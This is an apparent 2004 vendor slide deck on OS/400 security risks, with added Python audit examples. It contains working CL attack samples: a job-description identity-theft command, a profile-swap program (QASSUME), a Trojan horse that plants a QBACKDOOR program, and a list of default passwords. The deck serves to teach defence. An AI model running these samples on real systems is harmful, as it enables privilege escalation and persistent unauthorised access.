Top 10 OS/400 Security Risks
October 2004
John Earl
Chief Technology Officer
info@powertechgroup.com
PowerTech/IBM Relationship
> Multi-level
HACKERS!!!
www.powertech.com
Conclusion
User Identity Theft
At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the Job Description.
Example:
    SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) +
               SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST) +
               USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) +
           JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)
Program QSYS/QASSUME
    PGM        PARM(&USER)
    DCL        &USER   *CHAR 10
    DCL        &HANDLE *CHAR 10
    DCL        &ERROR  *CHAR 4
    CHGVAR     %BIN(&ERROR) 0
    CALL       'QSYGETPH' PARM(&USER *NOPWD &HANDLE &ERROR)
    CHGVAR     %BIN(&ERROR) 0
    CALL       'QWTSETP' PARM(&HANDLE &ERROR)
    ENDPGM
qsecofr
qsysopr
qpgmr
password
2222
service
1111111
2222222
qserv
qsvr
secofr
ibmce
Value       Setting   Description
QPWDEXPITV  90        90 Days
QPWDMINLEN  6         6 Character Minimum length
QPWDRQDDGT  1         Require a digit
QPWDRQDDIF  5         Unique in 10
Powerful Users
System Value Weaknesses
Signon Control: regulate signon to prevent attacks
QDSPSGNINF
QRMTSIGN     *VERIFY
QMAXSIGN
QMAXSGNACN
QINACTITV    30
QINACTMSGQ   *DSCJOB    When job is timed out, disconnect job and show signon screen.
Malicious Programs
Prevent malicious programs from being loaded to your system by setting these system values:
QALWOBJRST   *NONE
QVFYOBJRST
QFRCCVNRST
QSECURITY = 40 or 50
10 = Physical Security
20 = Password Security
30 = Resource Security
40 = Operating System Security
50 = Enhanced Operating System Security
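A baseline check over the system values this section recommends, as an added example that is not code from the deck or from PowerTech. It parses a constructed NAME VALUE listing (not genuine DSPSYSVAL output) and compares each value with the settings the slides give; the mapping of the slide's *NONE to QALWOBJRST and the "at least as strict as unique in 10" reading of QPWDRQDDIF are assumptions noted in the code.

```python
"""Baseline check for the OS/400 system values recommended in this deck.

Added example (not PowerTech's code). Input is a constructed "NAME VALUE"
listing, not genuine DSPSYSVAL output; the baseline values come from the
slides, and the QALWOBJRST *NONE mapping is an assumption.
"""

# Constructed sample listing: one system value per line, NAME then VALUE.
# Deliberately mixes compliant and non-compliant settings.
SAMPLE_DUMP = """\
QSECURITY  30
QPWDEXPITV 90
QPWDMINLEN 4
QPWDRQDDGT 0
QPWDRQDDIF 5
QRMTSIGN   *FRCSIGNON
QINACTITV  *NONE
QINACTMSGQ *DSCJOB
QALWOBJRST *ALL
"""

# Baseline: name -> (comparator, expected).
#   "ge": numeric value must be >= expected
#   "le": numeric value must be <= expected
#   "eq": value must match expected (case-insensitive)
#   "in": value must be one of the listed settings
BASELINE = {
    "QSECURITY":  ("ge", 40),                      # 40 or 50
    "QPWDEXPITV": ("le", 90),                      # password expires within 90 days
    "QPWDMINLEN": ("ge", 6),                       # 6 character minimum length
    "QPWDRQDDGT": ("eq", "1"),                     # require a digit
    "QPWDRQDDIF": ("in", {"1", "2", "3", "4", "5"}),  # 5 = unique in 10; lower = stricter (assumed reading)
    "QRMTSIGN":   ("eq", "*VERIFY"),               # remote sign-on must be verified
    "QINACTITV":  ("le", 30),                      # inactive job timeout, minutes
    "QINACTMSGQ": ("eq", "*DSCJOB"),               # disconnect timed-out jobs
    "QALWOBJRST": ("eq", "*NONE"),                 # assumed: the slide's *NONE applies here
}


def parse_dump(text):
    """Parse the constructed 'NAME VALUE' listing into a dict."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        name, _, value = line.partition(" ")
        values[name] = value.strip()
    return values


def _compare(actual, op, expected):
    if op == "eq":
        return actual.upper() == expected.upper()
    if op == "in":
        return actual in expected
    try:
        number = int(actual)
    except ValueError:          # *NOMAX, *NONE and friends never meet a numeric bound
        return False
    return number >= expected if op == "ge" else number <= expected


def evaluate(dump_text):
    """Return (name, actual, ok) for every baseline entry; a missing value fails."""
    values = parse_dump(dump_text)
    results = []
    for name, (op, expected) in BASELINE.items():
        actual = values.get(name)
        ok = actual is not None and _compare(actual, op, expected)
        results.append((name, actual if actual is not None else "<missing>", ok))
    return results


def failing(dump_text):
    """Names of the system values that do not meet the baseline."""
    return [name for name, _, ok in evaluate(dump_text) if not ok]


if __name__ == "__main__":
    for name, actual, ok in evaluate(SAMPLE_DUMP):
        print(f"{'PASS' if ok else 'FAIL'} {name:<11} {actual}")
```

Special values such as *NOMAX or *NONE are treated as failures for numeric bounds on purpose: an inactivity timeout of *NONE is exactly the weakness the slide warns about, not a parsing problem.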
Libraries and Library Lists
The Open Door Policy
WHO IS *PUBLIC?
Any user of this computer who does not have explicit authority to a given object.
Programs, display files, print files, work management objects, etc.: all static objects (those that do not contain data in one form or another) will work for users that have only change.
Data files, data areas, data queues, message queues, etc.: those things that regularly change as a matter of normal business.
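One way to turn the static-versus-data distinction into a review of *PUBLIC authority, as an added example that is not code from the deck or from PowerTech. The object records are constructed (library, object, type, attribute, *PUBLIC authority, roughly the columns DSPOBJD and DSPOBJAUT provide), and the ceilings it enforces (static objects may be *PUBLIC *USE, data objects should be *PUBLIC *EXCLUDE) are an assumed policy, not a statement from the slide.

```python
"""Flag *PUBLIC authority that exceeds an object's role.

Added example (not PowerTech's code). Object records are constructed; the
ceilings are an assumed policy built on the slide's static-versus-data split.
"""
from __future__ import annotations

# Authority levels ordered from least to most powerful.
RANK = {"*EXCLUDE": 0, "*USE": 1, "*CHANGE": 2, "*ALL": 3}

# Static objects: programs, display/print files, work management objects.
STATIC_TYPES = {"*PGM", "*CMD", "*JOBD", "*SBSD", "*CLS", "*MENU"}
STATIC_FILE_ATTRS = {"DSPF", "PRTF"}
# Data objects: database files, data areas, data queues, message queues.
DATA_TYPES = {"*DTAARA", "*DTAQ", "*MSGQ"}
DATA_FILE_ATTRS = {"PF", "LF"}

# Assumed *PUBLIC ceiling per role.
CEILING = {"static": "*USE", "data": "*EXCLUDE"}

# Constructed records: (library, object, type, attribute, *PUBLIC authority).
SAMPLE_OBJECTS = [
    ("PAYLIB", "PAYMAST", "*FILE",   "PF",   "*CHANGE"),   # data file open to everyone
    ("PAYLIB", "PAYHIST", "*FILE",   "LF",   "*EXCLUDE"),  # data file locked down
    ("PAYLIB", "PAYPGM",  "*PGM",    "CLP",  "*USE"),      # program, run-only
    ("PAYLIB", "PAYSCR",  "*FILE",   "DSPF", "*ALL"),      # display file, far too open
    ("PAYLIB", "CTLDTA",  "*DTAARA", "",     "*USE"),      # data area readable by all
    ("QGPL",   "QBATCH",  "*JOBD",   "",     "*USE"),      # job description, run-only
    ("PAYLIB", "PAYLIST", "*FILE",   "PF",   "*AUTL"),     # governed by an authorization list
]


def classify(obj_type: str, attribute: str) -> str:
    """Return 'static', 'data' or 'unknown' for an object type/attribute pair."""
    if obj_type in STATIC_TYPES or (obj_type == "*FILE" and attribute in STATIC_FILE_ATTRS):
        return "static"
    if obj_type in DATA_TYPES or (obj_type == "*FILE" and attribute in DATA_FILE_ATTRS):
        return "data"
    return "unknown"


def audit_public(records):
    """Return (name, role, *PUBLIC authority, ceiling) for every object over its ceiling."""
    findings = []
    for lib, obj, otype, attr, public in records:
        role = classify(otype, attr)
        if role == "unknown" or public not in RANK:
            # Unknown roles and *AUTL-governed objects need the list itself; not judged here.
            continue
        ceiling = CEILING[role]
        if RANK[public] > RANK[ceiling]:
            findings.append((f"{lib}/{obj}", role, public, ceiling))
    return findings


def risky_objects(records) -> list[str]:
    """Qualified names of the objects audit_public flags."""
    return [name for name, *_ in audit_public(records)]


if __name__ == "__main__":
    for name, role, public, ceiling in audit_public(SAMPLE_OBJECTS):
        print(f"{name:<18} {role:<7} *PUBLIC {public:<9} (ceiling {ceiling})")
```

Objects whose *PUBLIC authority is *AUTL are skipped rather than judged, because the effective authority lives in the authorization list and has to be reviewed there.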
Promiscuous Object Ownership
Line access
DFU, DBU, EZView and other data manipulation tools
QUERY/400, SQL, and other query tools
Others???
Command Line Interface Abuse
A Trojan Horse
> Program QSYS/QTROJAN
    QSYS/DCL      &ALLOBJ *CHAR 10
    QSYS/DCL      &COUNT *DEC (3 0)
    QSYS/DCL      &SPCAUT *CHAR 100
    QSYS/DCL      &START *DEC (3 0) VALUE(1)
    QSYS/MONMSG   CPF0000
    QSYS/RTVUSRPRF SPCAUT(&SPCAUT)
LOOP: IF (&COUNT *LE 10)
    QSYS/CHGVAR   VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))
    QSYS/IF       COND(&ALLOBJ = 'ALLOBJ') THEN(DO)
    QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +
                  OPTION(*NOSRC) GENOPT(*NOLIST) +
                  USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) +
                  AUT(*ALL)
    QSYS/RETURN
    QSYS/ENDDO
    QSYS/CHGVAR   VAR(&COUNT) VALUE(&COUNT + 1)
    QSYS/CHGVAR   VAR(&START) VALUE(&START + 10)
    QSYS/GOTO     LOOP
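The program above leaves behind a QSYS/QBACKDOOR that adopts an *ALLOBJ owner and is callable by *PUBLIC. The scan below is an added example, not code from the deck or from PowerTech, of how a reviewer would surface that kind of object: the program records (library, program, owner, USRPRF attribute, *PUBLIC authority, whether source is retained) and the set of *ALLOBJ profiles are constructed stand-ins for what DSPPGM, DSPOBJAUT and DSPUSRPRF would give, and the scoring rules are assumptions.

```python
"""Surface programs that adopt a powerful owner and are runnable by *PUBLIC.

Added example (not PowerTech's code). Program records and the *ALLOBJ
profile set are constructed; the scoring rules are assumptions.
"""

# Constructed: profiles holding *ALLOBJ special authority.
ALLOBJ_PROFILES = {"QSECOFR", "OPSADMIN"}

# Constructed: (library, program, owner, USRPRF attribute, *PUBLIC authority, source retained)
SAMPLE_PROGRAMS = [
    ("QSYS",   "QBACKDOOR", "QSECOFR",  "*OWNER", "*ALL",     False),
    ("PAYLIB", "PAYUPD",    "PAYOWNER", "*OWNER", "*USE",     True),
    ("UTIL",   "FIXDATA",   "OPSADMIN", "*OWNER", "*USE",     False),
    ("UTIL",   "RPTGEN",    "OPSADMIN", "*USER",  "*ALL",     True),
    ("SECLIB", "SETPROF",   "QSECOFR",  "*OWNER", "*EXCLUDE", True),
]

RUNNABLE = {"*USE", "*CHANGE", "*ALL"}   # *PUBLIC levels that allow CALL


def assess(record):
    """Return (name, severity, reasons) for a worrying adopting program, else None."""
    lib, pgm, owner, usrprf, public, source_retained = record
    # Only USRPRF(*OWNER) programs adopt; assumed: adopting an ordinary owner is routine.
    if usrprf != "*OWNER" or owner not in ALLOBJ_PROFILES:
        return None
    reasons = [f"adopts {owner} (*ALLOBJ)"]
    if public in RUNNABLE:
        reasons.append(f"*PUBLIC {public}")
    if not source_retained:
        reasons.append("source not retained")   # compare ALWRTVSRC(*NO) in the slide's example
    if lib == "QSYS":
        reasons.append("placed in QSYS")
    severity = "HIGH" if public in RUNNABLE else "MEDIUM"
    return (f"{lib}/{pgm}", severity, reasons)


def scan(programs):
    """All worrying adopting programs, in input order."""
    return [result for result in map(assess, programs) if result is not None]


if __name__ == "__main__":
    for name, severity, reasons in scan(SAMPLE_PROGRAMS):
        print(f"{severity:<6} {name:<16} {'; '.join(reasons)}")
```

A program that adopts QSECOFR but is *PUBLIC *EXCLUDE still shows up at MEDIUM: it may be legitimate, but the owner's private authorities decide who can reach it, and that list deserves a look.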
Trojan Horses
(WRKSYSVAL)
QATNPGM     - Attention program
QPWDVLDPGM  - Password validation program
QRMTSIGN    - Remote sign-on control
QSTRUPPGM   - Startup program
(CHGNETA)
PCSACC      - PC Support exit point
DDMACC      - DDM exit point
ADDEXITPRG
Trojan Horses
> Subsystems (CHGMSGD) (CHGSBSD)
No Audit Ability
> What if the data was not damaged, but only stolen?
Why?
It's free (from IBM)
It's a comprehensive gathering tool
It's an irrefutable source of historical events.
QAUDCTL(*AUDLVL) +
QAUDLVL(*AUTFAIL *CREATE *DELETE +
        *JOBDTA *NETCMN *OBJMGT +
        *OFCSRV *OPTICAL *PGMADP +
        *PGMFAIL *PRTDTA *SAVRST +
        *SECURITY *SERVICE *SPLFDTA +
        *SYSMGT) +
INLJRNRCV(SECURLIB/AUDRCV0001)
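Collecting these audit levels only pays off if someone reads the journal. The triage below is an added example, not code from the deck or from PowerTech: the entry type codes are the real QAUDJRN types (PW invalid password, AF authority failure, JS job start, CO create object, PA adopted authority, PS profile swap, SV system value change), but the one-line record layout is a constructed simplification of a DSPJRN extract and the password threshold is an assumption.

```python
"""Triage a run of security audit journal records.

Added example (not PowerTech's code). Entry type codes are real QAUDJRN
types; the record layout is a constructed simplification of a DSPJRN
extract, and the threshold is an assumption.
"""
from collections import Counter

# Constructed records: timestamp, entry type, user, job, free-text detail.
SAMPLE_RECORDS = """\
2004-10-05T08:01:12 PW JSMITH  QPADEV0001 invalid password
2004-10-05T08:01:20 PW JSMITH  QPADEV0001 invalid password
2004-10-05T08:01:31 PW JSMITH  QPADEV0001 invalid password
2004-10-05T08:15:02 JS JSMITH  QPADEV0001 job start
2004-10-05T08:16:40 CO JSMITH  QPADEV0001 QSYS/QBACKDOOR *PGM
2004-10-05T08:17:03 PA JSMITH  QPADEV0001 QSYS/QBACKDOOR adopted QSECOFR
2004-10-05T08:17:05 PS JSMITH  QPADEV0001 swapped to QSECOFR
2004-10-05T08:20:11 SV QSECOFR QPADEV0001 QAUDLVL changed
2004-10-05T09:00:00 AF MJONES  QPADEV0002 PAYLIB/PAYMAST *FILE
"""

PW_THRESHOLD = 3  # assumed: this many bad passwords from one user warrants review

# Entry types that are always worth a human look, with the label reported.
ALWAYS_REPORT = {
    "AF": "authority failure",
    "PA": "adopted authority used",
    "PS": "profile swap",
    "SV": "system value changed",
}


def parse_records(text):
    """Split each constructed record into its five fields."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, etype, user, job, detail = line.split(maxsplit=4)
        rows.append({"ts": ts, "type": etype, "user": user, "job": job, "detail": detail})
    return rows


def triage(text):
    """Return (label, user, detail) findings; password aggregates come first."""
    rows = parse_records(text)
    findings = []
    bad_pw = Counter(r["user"] for r in rows if r["type"] == "PW")
    for user, count in bad_pw.items():
        if count >= PW_THRESHOLD:
            findings.append(("repeated invalid passwords", user, f"{count} attempts"))
    for r in rows:
        label = ALWAYS_REPORT.get(r["type"])
        if r["type"] == "CO" and r["detail"].startswith("QSYS/"):
            label = "object created in QSYS"   # user-created objects do not belong there
        if label:
            findings.append((label, r["user"], r["detail"]))
    return findings


if __name__ == "__main__":
    for label, user, detail in triage(SAMPLE_RECORDS):
        print(f"{label:<28} {user:<8} {detail}")
```

Read in order, the constructed sample tells the story the earlier slides describe: bad passwords, a program created in QSYS, adopted authority, a profile swap, and finally QAUDLVL itself being changed, which is why changes to the audit system values deserve their own alert.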
10. Unprotected Network Access
Application Menu (CRM)
Some of the network access methods:
CLIENT ACCESS/400*
Windows Network
Neighborhood
Shared Folders
Shared Printers
FTP
NetServer
Get File
Put File
Delete File
Delete Library
Remote Command
DDM
Copy File
Remote Command
DRDA
Shared Folders
Etc.
Exit point flow: Main program -> User specified exit program: analyze request & return result (pass/fail) -> Main program: continue processing...
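A model of the pass/fail decision an exit program makes, as an added example that is not code from the deck or from PowerTech (or from any PowerTech product). The rule table, the server and function names (GET, PUT, DELETELIB, RMTCMD, COPYFILE) and the request shape are constructed to illustrate the flow on the slide; they are not the parameter layout of any real exit point.

```python
"""Model of a network exit program's pass/fail decision.

Added example (not PowerTech's code). Rules, server/function names and
the request shape are constructed; default is deny.
"""

# Constructed allow-list: (server, user or "*" for anyone, allowed functions, allowed libraries).
# A request passes only if some rule matches every part of it.
RULES = [
    ("FTP", "BATCHXFER", {"GET", "PUT"}, {"XFERLIB"}),
    ("FTP", "*",         {"GET"},        {"PUBLIB"}),
    ("DDM", "DDMSVC",    {"COPYFILE"},   {"PAYLIB"}),
]

DECISION_LOG = []   # every request and its outcome, kept for later review


def library_of(obj: str) -> str:
    """'PAYLIB/PAYMAST' -> 'PAYLIB'; an unqualified or empty name has no library."""
    lib, sep, _ = obj.partition("/")
    return lib if sep else ""


def exit_program(server: str, user: str, function: str, obj: str = "") -> bool:
    """Analyze one request and return True (pass) or False (fail)."""
    accepted = any(
        rule_server == server
        and rule_user in ("*", user)
        and function in functions
        and library_of(obj) in libraries
        for rule_server, rule_user, functions, libraries in RULES
    )
    DECISION_LOG.append((server, user, function, obj, "PASS" if accepted else "FAIL"))
    return accepted


def failed_requests():
    """Rejected requests from the log: the feed a security monitor would watch."""
    return [entry for entry in DECISION_LOG if entry[4] == "FAIL"]


if __name__ == "__main__":
    # Constructed requests: a scheduled transfer, a library delete, a remote command.
    exit_program("FTP", "BATCHXFER", "PUT", "XFERLIB/DAILY")
    exit_program("FTP", "BATCHXFER", "DELETELIB", "PAYLIB")
    exit_program("FTP", "JSMITH", "RMTCMD")
    for entry in DECISION_LOG:
        print(*entry)
```

Two design choices carry the weight here: nothing is allowed unless a rule says so, and every decision, accepted or not, is logged, since the rejected requests are the visibility the later slides talk about.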
2003 PowerTech Group, Inc. All rights reserved.
FTP Server, TELNET Server, Database Server, DDM Server, SQL Server, DRDA Server, File xfer Server -> PROGRAM
Provides:
Visibility to network activity
Control of network activity
Security monitoring
(DISTRIBUTORS, EMPLOYEES, SUPPLIERS)
Conclusions
Thank You
Contact Info:
John Earl
Chief Technology Officer
The PowerTech Group
john.earl@powertech.com
253.872.7788 x302